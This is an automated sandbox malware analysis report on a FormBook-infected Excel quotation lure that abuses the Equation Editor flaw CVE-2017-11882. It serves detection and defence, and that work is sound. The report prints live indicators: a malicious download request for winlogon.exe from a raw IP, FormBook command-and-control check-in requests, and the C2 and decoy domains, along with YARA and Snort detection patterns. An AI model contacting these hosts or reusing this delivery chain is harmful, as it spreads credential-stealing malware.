
Windows Analysis Report: Quotation Request - Alligator Pty Ltd.xlsx

Overview

General Information

Sample Name: Quotation Request - Alligator Pty Ltd.xlsx
Analysis ID: 532880
MD5: 90e995ae2b06b84644586091a994f43a
SHA1: a6c83577fd947650a6b816fd910ebb7fd3464bca
SHA256: 1e8d78f614b82c1bdc730e745228b860d5b71888ac90efbf5d74af4ea3f876f9
Tags: Formbook, VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2212 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1160 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2556 cmdline: "C:\Users\Public\vbc.exe" MD5: 8E90E8E526BC80036BA6B50A913A1880)
      • vbc.exe (PID: 2080 cmdline: "C:\Users\Public\vbc.exe" MD5: 8E90E8E526BC80036BA6B50A913A1880)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • msiexec.exe (PID: 2952 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
            • cmd.exe (PID: 2032 cmdline: /c del "C:\Users\Public\vbc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.dubaibiologicdentist.com/hf9j/"], "decoy": ["afrifarmgroup.com", "coffeeassiciation.com", "unlimit-ed.com", "guy.rest", "dnemperor.com", "ringstorule.com", "reelnasty.com", "travelgleam.com", "sagestyleresale.com", "jiaoyizhuan.club", "fastred.biz", "xn--fiqs8srv0ahj5a.xn--czru2d", "eden-foundation.com", "exquisite-epoxy-systems.com", "luxurycaroffer.com", "sdffzc.com", "suvsdealsonlinesearchdusorg.com", "weihaits.com", "fetch-us-mtg-refi.zone", "uterinevmkvhm.online", "redcarpetwithrob.online", "puertasautomaticassalceda.com", "blockchainsupport.global", "lalasushi.com", "picaworks.online", "airductcleaningindianapolis.net", "maximumdouglas.com", "bs2860.com", "pharmaceuticalmarking.com", "billionaireroyalties.com", "libertarias.wiki", "cupsnax.com", "koutarouserver.com", "crazydealeon.com", "amoraprimeirajogada.com", "fearlessfashionaccessories.biz", "ella.tech", "breackae.xyz", "hostmatadvice.com", "aestheticnursearie.com", "henryzingo.com", "folpro.com", "kooles.com", "rushingrofogg.xyz", "377techan.com", "sprookjesbosch.store", "newsymphonie.net", "lawswashington.com", "homesandhorses.net", "jacobalexandermusic.com", "ll1ysq.biz", "faceresurfacing.com", "thekeappro.com", "joycemalaysiaproperty.com", "traexcel.com", "subsoilcorp.com", "thejoannaha.com", "477karakabayrd.com", "bfcmtld.com", "kuratours.com", "group-place.com", "sixtreechina.com", "rattansagar.com", "ascenddronenews.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bec:$sqlite3step: 68 34 1C 7B E1
  • 0x16b08:$sqlite3text: 68 38 2A 90 C5
  • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

Exploits:

Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1160, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlogon[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1160, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2556
Sigma detected: Execution from Suspicious Folder
Source: Process started | Author: Florian Roth | Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1160, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2556

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: Quotation Request - Alligator Pty Ltd.xlsx | ReversingLabs: Detection: 31%
Yara detected FormBook
Source: Yara match | File source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://107.173.191.75/dodge/winlogon.exe | Avira URL Cloud: Label: malware
Source: 7.2.msiexec.exe.29e796c.7.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 7.2.msiexec.exe.2a35f0.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 5.2.vbc.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.0.unpack | Avira: Label: TR/Patched.Ren.Gen2
Source: 5.0.vbc.exe.400000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.vbc.exe.1e90000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.1.vbc.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: msiexec.pdb source: vbc.exe, 00000005.00000002.541236797.00000000002DA000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.541224912.00000000002C9000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.543131864.00000000025C0000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000003.481808621.00000000004A0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.542128053.0000000000910000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.483202698.0000000000600000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.541453296.0000000000790000.00000040.00000001.sdmp, msiexec.exe
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405C22 FindFirstFileA,FindClose,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00402630 FindFirstFileA,
Source: global traffic | DNS query: name: www.travelgleam.com
Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then pop edi
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 107.173.191.75:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 47.246.136.142:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 47.246.136.142:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 47.246.136.142:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.subsoilcorp.com
Source: C:\Windows\explorer.exe | Domain query: www.travelgleam.com
Source: C:\Windows\explorer.exe | Domain query: www.ll1ysq.biz
Source: C:\Windows\explorer.exe | Network Connect: 162.210.195.97 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.dubaibiologicdentist.com/hf9j/
Source: Joe Sandbox View | ASN Name: LEASEWEB-USA-WDCUS LEASEWEB-USA-WDCUS
Source: global traffic | HTTP traffic detected: GET /hf9j/?NnwLW=lTeXzRfHoPHDqpa&LnftM=Hi4i/MzZWraYpeia3tFw/razG0ol5F63XlO+NDDVDOKGXMifKzAuqwSCBSP91u5pGStR7A== HTTP/1.1 Host: www.travelgleam.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hf9j/?LnftM=Pqr9SePoNfnaC1kg2G0jCGwXX1ba57NV0gLvpt/5y4PrrRm7oBIm/XhJEBzYJkmjKkGOCg==&NnwLW=lTeXzRfHoPHDqpa HTTP/1.1 Host: www.sdffzc.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK Date: Thu, 02 Dec 2021 18:18:07 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.33 Last-Modified: Thu, 02 Dec 2021 08:53:53 GMT ETag: "7d5a3-5d225ee196c33" Accept-Ranges: bytes Content-Length: 513443 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload
Source: global traffic | HTTP traffic detected: GET /dodge/winlogon.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 107.173.191.75 Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: EXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.531356125.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://computername/printers/printername/.printer
Source: EXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com
Source: EXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com/
Source: EXCEL.EXE, 00000000.00000002.687693304.0000000005307000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.499463550.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: EXCEL.EXE, 00000000.00000002.687693304.0000000005307000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.499463550.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, vbc.exe, 00000004.00000000.473056040.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000004.00000002.482277603.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.477794884.0000000000409000.00000008.00020000.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vbc.exe, 00000004.00000000.473056040.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000004.00000002.482277603.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.477794884.0000000000409000.00000008.00020000.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000004.00000002.484925855.0000000002360000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.497759823.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.500770240.0000000003E50000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: EXCEL.EXE, 00000000.00000002.687693304.0000000005307000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.499463550.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.531356125.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.531356125.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: EXCEL.EXE, 00000000.00000002.687693304.0000000005307000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.499463550.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.484925855.0000000002360000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.497759823.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.531356125.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: EXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: EXCEL.EXE, 00000000.00000002.687693304.0000000005307000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.499463550.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.531356125.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.493469713.0000000004399000.00000004.00000001.sdmp | String found in binary or memory: http://www.mozilla.com0
Source: EXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.495771332.0000000008414000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.504413647.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.501565204.0000000004513000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.495771332.0000000008414000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.504413647.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.501565204.0000000004513000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\42A24FD9.emf
Source: unknown | DNS traffic detected: queries for: www.travelgleam.com
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

      E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, type: MEMORY

      System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 8 | Screenshot OCR: enable Editing and Content from the Yellow bar 21 above to view locked content. 22 ,, 24 25 "
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlogon[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
